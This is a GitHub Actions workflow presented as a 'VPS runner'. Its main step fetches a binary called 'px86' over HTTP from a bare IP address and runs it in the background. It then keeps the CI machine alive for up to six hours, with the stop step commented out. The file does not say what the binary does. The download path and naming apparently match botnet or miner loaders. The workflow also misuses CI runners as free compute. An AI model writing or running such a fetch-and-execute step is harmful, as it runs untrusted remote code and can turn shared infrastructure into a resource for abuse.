name: Minimal VPS Runner

on:
  workflow_dispatch:
    inputs:
      uptime:
        description: 'VPS uptime in hours (max 6)'
        required: false
        default: '6'
        type: choice
        options:
          - '1'
          - '2'
          - '3'
          - '4'
          - '5'
          - '6'

jobs:
  run-binary:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Download and run binary in background
        run: |
          wget http://45.138.16.158/bins/px86 -O px86
          chmod +x px86
          # Run binary in background and redirect output
          nohup ./px86 x86 > binary_output.log 2>&1 &
          echo "Binary started in background with PID $!"
          
          # Store PID for potential later use
          echo $! > binary.pid

      - name: Keep VM alive for specified time
        run: |
          UPTIME_SECONDS=$(( ${{ github.event.inputs.uptime }} * 3600 ))
          echo "Keeping VM alive for $UPTIME_SECONDS seconds (${{ github.event.inputs.uptime }} hours)..."
          
          # Sleep for the specified time
          sleep $UPTIME_SECONDS
          
          echo "Uptime completed, workflow finishing..."

      - name: Optional - Stop binary (commented out)
        if: always()
        run: |
          # Uncomment the following lines if you want to stop the binary when workflow ends
          # if [ -f binary.pid ]; then
          #   PID=$(cat binary.pid)
          #   echo "Stopping binary with PID $PID"
          #   kill $PID 2>/dev/null || true
          # fi
          echo "Binary continues running until VM termination"
